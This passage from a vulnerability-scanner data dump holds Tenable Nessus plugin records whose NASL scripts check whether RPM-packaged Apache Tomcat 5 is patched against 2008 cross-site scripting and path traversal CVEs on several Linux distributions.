script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat5-server-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat5-servlet-2.4-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat5-servlet-2.4-api-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat5-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/06/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"tomcat5-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"tomcat5-admin-webapps-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"tomcat5-common-lib-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"tomcat5-jasper-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"tomcat5-jasper-javadoc-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"tomcat5-jsp-2.0-api-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"tomcat5-jsp-2.0-api-javadoc-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"tomcat5-server-lib-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"tomcat5-servlet-2.4-api-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"tomcat5-servlet-2.4-api-javadoc-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"tomcat5-webapps-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat5 / tomcat5-admin-webapps / tomcat5-common-lib / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:28:26", "description": "A cross-site scripting vulnerability was discovered in the HttpServletResponse.sendError() method. A remote attacker could inject arbitrary web script or HTML via forged HTTP headers. (CVE-2008-1232)\n\nAn additional cross-site scripting vulnerability was discovered in the host manager application. A remote attacker could inject arbitrary web script or HTML via the hostname parameter. (CVE-2008-1947)\n\nA traversal vulnerability was discovered when using a RequestDispatcher in combination with a servlet or JSP. A remote attacker could utilize a specially crafted request parameter to access protected web resources. (CVE-2008-2370)\n\nAn additional traversal vulnerability was discovered when the 'allowLinking' and 'URIencoding' settings were activated. A remote attacker could use a UTF-8-encoded request to extend their privileges and obtain local files accessible to the Tomcat process.\n(CVE-2008-2938)", "cvss3": {}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : tomcat on SL5.x i386/x86_64", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1232", "CVE-2008-1947", "CVE-2008-2370", "CVE-2008-2938"], "modified": "2021-01-14T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20080827_TOMCAT_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60470", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60470);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2008-2938\");\n\n script_name(english:\"Scientific Linux Security Update : tomcat on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A cross-site scripting vulnerability was discovered in the\nHttpServletResponse.sendError() method. A remote attacker could inject\narbitrary web script or HTML via forged HTTP headers. (CVE-2008-1232)\n\nAn additional cross-site scripting vulnerability was discovered in the\nhost manager application. A remote attacker could inject arbitrary web\nscript or HTML via the hostname parameter. (CVE-2008-1947)\n\nA traversal vulnerability was discovered when using a\nRequestDispatcher in combination with a servlet or JSP. A remote\nattacker could utilize a specially crafted request parameter to access\nprotected web resources. (CVE-2008-2370)\n\nAn additional traversal vulnerability was discovered when the\n'allowLinking' and 'URIencoding' settings were activated. A remote\nattacker could use a UTF-8-encoded request to extend their privileges\nand obtain local files accessible to the Tomcat process.\n(CVE-2008-2938)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0809&L=scientific-linux-errata&T=0&P=207\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2a60964c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22, 79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/06/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"tomcat5-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"tomcat5-admin-webapps-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"tomcat5-common-lib-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"tomcat5-jasper-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"tomcat5-jasper-javadoc-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"tomcat5-jsp-2.0-api-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"tomcat5-jsp-2.0-api-javadoc-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"tomcat5-server-lib-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"tomcat5-servlet-2.4-api-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"tomcat5-servlet-2.4-api-javadoc-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"tomcat5-webapps-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:40:38", "description": "Updated tomcat packages that fix several security issues are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\n\nA cross-site scripting vulnerability was discovered in the HttpServletResponse.sendError() method. A remote attacker could inject arbitrary web script or HTML via forged HTTP headers. (CVE-2008-1232)\n\nAn additional cross-site scripting vulnerability was discovered in the host manager application. A remote attacker could inject arbitrary web script or HTML via the hostname parameter. (CVE-2008-1947)\n\nA traversal vulnerability was discovered when using a RequestDispatcher in combination with a servlet or JSP. A remote attacker could utilize a specially crafted request parameter to access protected web resources. (CVE-2008-2370)\n\nAn additional traversal vulnerability was discovered when the 'allowLinking' and 'URIencoding' settings were activated. A remote attacker could use a UTF-8-encoded request to extend their privileges and obtain local files accessible to the Tomcat process.\n(CVE-2008-2938)\n\nUsers of tomcat should upgrade to these updated packages, which contain backported patches to resolve these issues.", "cvss3": {}, "published": "2008-08-28T00:00:00", "type": "nessus", "title": "RHEL 5 : tomcat (RHSA-2008:0648)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1232", "CVE-2008-1947", "CVE-2008-2370", "CVE-2008-2938"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:tomcat5", "p-cpe:/a:redhat:enterprise_linux:tomcat5-admin-webapps", "p-cpe:/a:redhat:enterprise_linux:tomcat5-common-lib", "p-cpe:/a:redhat:enterprise_linux:tomcat5-jasper", "p-cpe:/a:redhat:enterprise_linux:tomcat5-jasper-javadoc", "p-cpe:/a:redhat:enterprise_linux:tomcat5-jsp-2.0-api", "p-cpe:/a:redhat:enterprise_linux:tomcat5-jsp-2.0-api-javadoc", "p-cpe:/a:redhat:enterprise_linux:tomcat5-server-lib", "p-cpe:/a:redhat:enterprise_linux:tomcat5-servlet-2.4-api", "p-cpe:/a:redhat:enterprise_linux:tomcat5-servlet-2.4-api-javadoc", "p-cpe:/a:redhat:enterprise_linux:tomcat5-webapps", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:5.2"], "id": "REDHAT-RHSA-2008-0648.NASL", "href": "https://www.tenable.com/plugins/nessus/34057", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0648. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34057);\n script_version(\"1.33\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2008-2938\");\n script_bugtraq_id(29502, 30494, 30496, 30633);\n script_xref(name:\"RHSA\", value:\"2008:0648\");\n\n script_name(english:\"RHEL 5 : tomcat (RHSA-2008:0648)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated tomcat packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nApache Tomcat is a servlet container for the Java Servlet and\nJavaServer Pages (JSP) technologies.\n\nA cross-site scripting vulnerability was discovered in the\nHttpServletResponse.sendError() method. A remote attacker could inject\narbitrary web script or HTML via forged HTTP headers. (CVE-2008-1232)\n\nAn additional cross-site scripting vulnerability was discovered in the\nhost manager application. A remote attacker could inject arbitrary web\nscript or HTML via the hostname parameter. (CVE-2008-1947)\n\nA traversal vulnerability was discovered when using a\nRequestDispatcher in combination with a servlet or JSP. A remote\nattacker could utilize a specially crafted request parameter to access\nprotected web resources. (CVE-2008-2370)\n\nAn additional traversal vulnerability was discovered when the\n'allowLinking' and 'URIencoding' settings were activated. A remote\nattacker could use a UTF-8-encoded request to extend their privileges\nand obtain local files accessible to the Tomcat process.\n(CVE-2008-2938)\n\nUsers of tomcat should upgrade to these updated packages, which\ncontain backported patches to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-1232\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-1947\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-2370\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-2938\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0648\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22, 79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat5-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat5-common-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat5-jasper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat5-jasper-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat5-jsp-2.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat5-jsp-2.0-api-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat5-server-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat5-servlet-2.4-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat5-servlet-2.4-api-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat5-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/06/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0648\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"tomcat5-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"tomcat5-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"tomcat5-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"tomcat5-admin-webapps-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"tomcat5-admin-webapps-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"tomcat5-admin-webapps-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"tomcat5-common-lib-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"tomcat5-common-lib-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"tomcat5-common-lib-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"tomcat5-jasper-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"tomcat5-jasper-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"tomcat5-jasper-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"tomcat5-jasper-javadoc-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"tomcat5-jasper-javadoc-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"tomcat5-jasper-javadoc-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"tomcat5-jsp-2.0-api-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"tomcat5-jsp-2.0-api-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"tomcat5-jsp-2.0-api-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"tomcat5-jsp-2.0-api-javadoc-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"tomcat5-jsp-2.0-api-javadoc-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"tomcat5-jsp-2.0-api-javadoc-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"tomcat5-server-lib-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"tomcat5-server-lib-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"tomcat5-server-lib-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"tomcat5-servlet-2.4-api-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"tomcat5-servlet-2.4-api-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"tomcat5-servlet-2.4-api-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"tomcat5-servlet-2.4-api-javadoc-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"tomcat5-servlet-2.4-api-javadoc-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"tomcat5-servlet-2.4-api-javadoc-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"tomcat5-webapps-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"tomcat5-webapps-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"tomcat5-webapps-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat5 / tomcat5-admin-webapps / tomcat5-common-lib / etc\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:41:38", "description": "- Mon Sep 15 2008 David Walluck <dwalluck at redhat.com> 0:5.5.27-0jpp.2\n\n - add commons-io symlink\n\n - Mon Sep 15 2008 David Walluck <dwalluck at redhat.com> 0:5.5.27-0jpp.1\n\n - 5.5.27 Resolves: rhbz#456120 Resolves: rhbz#457934 Resolves: rhbz#446393 Resolves: rhbz#457597\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2008-09-17T00:00:00", "type": "nessus", "title": "Fedora 9 : tomcat5-5.5.27-0jpp.2.fc9 (2008-8113)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1232", "CVE-2008-1947", "CVE-2008-2370", "CVE-2008-2938"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:tomcat5", "cpe:/o:fedoraproject:fedora:9"], "id": "FEDORA_2008-8113.NASL", "href": "https://www.tenable.com/plugins/nessus/34226", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-8113.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34226);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-1232\", \"CVE-2008-1947\", 